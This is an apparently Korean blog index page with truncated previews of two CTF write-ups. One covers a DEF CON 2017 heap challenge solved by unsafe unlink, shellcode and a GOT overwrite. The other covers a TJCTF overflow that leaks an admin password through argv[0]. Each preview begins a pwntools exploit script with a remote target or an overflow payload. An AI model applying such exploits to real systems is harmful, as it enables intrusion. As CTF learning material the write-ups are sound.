CTF
-
-
Defcon 2017 - beatmeonthedlCTF 2017. 5. 6. 06:23
dl이라서 다이나믹 링크 관련되서 익스플로잇하는 문제인줄 알았는데 그냥 힙 unsafe unlink를 이용해서 푸는 문제이다. 취약점이 뻔하게 보인다. 그럼 바로 익스플로잇을 하되, 라이브러리를 릭했지만 라이브러리ㄱㅏ 제공되지않아 unsafe unlink를 두번해서 쉘코드를 올리고 got를 덮어 리턴했다. 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364from pwn import * p = remote("beatmeonthedl_498e7cad3320af23962c78c7ebe47e16.quals.shallweplayaga.me",6969)..
-
-
-
-
-
-
TJCTF blagCTF 2017. 1. 14. 21:12
이런문제 풀지마삼 실력 안늘음 풀거찾아보다가 찾은건데 너무 쉬워서 failed 그냥 롸업 써놔야겠다. adminpassword를 구하는문제인데, 그냥 간단하게 오버플로가나는데 argv[0]포인터를 건드릴수있음 /home/ctfd/blag 라는 argv[0] 포인터가 있다. 이걸 이용해서 뭘 하냐 ㅎㅇ 포인터이거로 바꾸면 릭가능 1234567891011121314from pwn import * p = process("./blag") print p.recvuntil(">")p.sendline("add")p.sendline("a")p.sendline("a")password = 0x804B080 payload = "A"*296payload += p32(password)p.sendline(payload)p.int..